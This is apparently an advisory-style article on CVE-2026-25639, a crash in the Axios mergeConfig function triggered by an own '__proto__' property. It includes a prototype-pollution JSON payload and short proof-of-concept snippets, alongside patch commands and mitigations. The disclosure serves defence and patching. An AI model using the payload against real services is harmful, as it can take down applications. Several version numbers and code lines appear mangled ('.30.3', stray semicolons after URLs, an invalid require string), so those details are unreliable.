CVE-2026-25639 - Axios MergeConfig Vulnerability Leads to Denial of Service

Axios is a top-tier HTTP client widely used in both front-end and back-end projects for JavaScript and Node.js. Its promise-based API, flexibility, and ease-of-use have made it a favorite choice for sending HTTP requests. However, a dangerous vulnerability (CVE-2026-25639) lurks in Axios versions prior to .30.3 and 1.13.5, and it can be easily exploited to crash any application that relies on Axios.

In this exclusive long read, let’s break down what CVE-2026-25639 is about, how it can be triggered, and how you can mitigate it.

What Is CVE-2026-25639?

CVE-2026-25639 is a vulnerability in the mergeConfig function of Axios. This function is supposed to merge two configuration objects (imagine two sets of settings for how requests should work) in a safe manner before making an HTTP request.

But prior to Axios version .30.3 (for the .x line) and 1.13.5 (for the 1.x line), this function crashes with a JavaScript TypeError when processing a configuration object that explicitly contains an __proto__ property—set as its own property, not just something inherited from the prototype chain.

Here’s why this is dangerous

- Simple payload: Anyone who can send or control your Axios configs (maybe via a REST API or user-supplied JSON) can trigger this.
- Complete denial of service (DoS): The process crashes, its job is stopped dead, potentially taking down servers or browser apps.
- Easy to reproduce: This is a logic flaw related to how plain objects and prototypes work in JavaScript. No need for fancy attacks or shell access.

Why Is __proto__ Special?

In JavaScript, every object inherits properties and methods from a prototype. The special property __proto__ allows access to an object’s prototype directly.

Malicious input like

{
  "__proto__": {
    "evil": "data"
  }
}

can “poison” the object’s prototype chain if not handled carefully. Most modern code (and many libraries) protect against this, but old or careless code sometimes doesn’t. Axios tried to do this, but its earlier mergeConfig logic didn’t fully account for situations where __proto__ appears as a direct property.

Exploit Details: How Attackers Crash Axios Apps

Suppose your server-side code receives arbitrary JSON, parses it, and uses it as Axios request config. Here’s all it takes:

const axios = require('axios'); // vulnerable version
const userInput = '{ "__proto__": {} }';
const configObject = JSON.parse(userInput);

axios.get('https://example.com';, configObject); // or mergeConfig call

// Application will crash with:
// TypeError: Cannot convert undefined or null to object

Key issue: The mergeConfig function stumbles when it tries to copy or merge properties from a config object with an own __proto__ property. This throws a TypeError, immediately bringing down the program.

Sample Proof of Concept (PoC)

const axios = require('axios@1.13.4'); // Vulnerable version
const maliciousConfig = JSON.parse('{"__proto__":{}}');

try {
  axios.get('https://api.github.com';, maliciousConfig)
    .then(response => console.log(response.data))
    .catch(console.error);
} catch (e) {
  console.error('Axios crashed:', e); // You'll see a TypeError here
}

You’ll see an error like

TypeError: Cannot convert undefined or null to object

Real-World Impact

If you’re running a Node.js server, exposing APIs that call other APIs with user-defined settings, any unauthenticated user could crash your app. Similarly, desktop and mobile Electron apps, or even browser-side JavaScript, are at risk if external data is passed unsafely to Axios.

NPM/Yarn fix example

npm install axios@latest
# or for .x line:
npm install axios@.30.3

Extra precautions

- Always sanitize user input. Never pass user-controlled objects to HTTP libraries as options/configs.
- Use Object.create(null) if you’re building config objects from scratch, to avoid accidental prototype pollution.
- Use tools like npm audit or Snyk to monitor packages for known vulnerabilities.

References

- Axios security advisory for CVE-2026-25639
- NPM Security Advisory Database
- Explaining prototype pollution

Conclusion

Axios is everywhere—this bug is a reminder to always keep dependencies updated, especially when they’re core modules like HTTP clients. CVE-2026-25639 is easy to trigger and can bring down your critical apps. Patch now, and audit your use of config objects for third-party libraries.

Timeline

Published on: 02/09/2026 20:11:22 UTC
Last modified on: 02/18/2026 18:24:34 UTC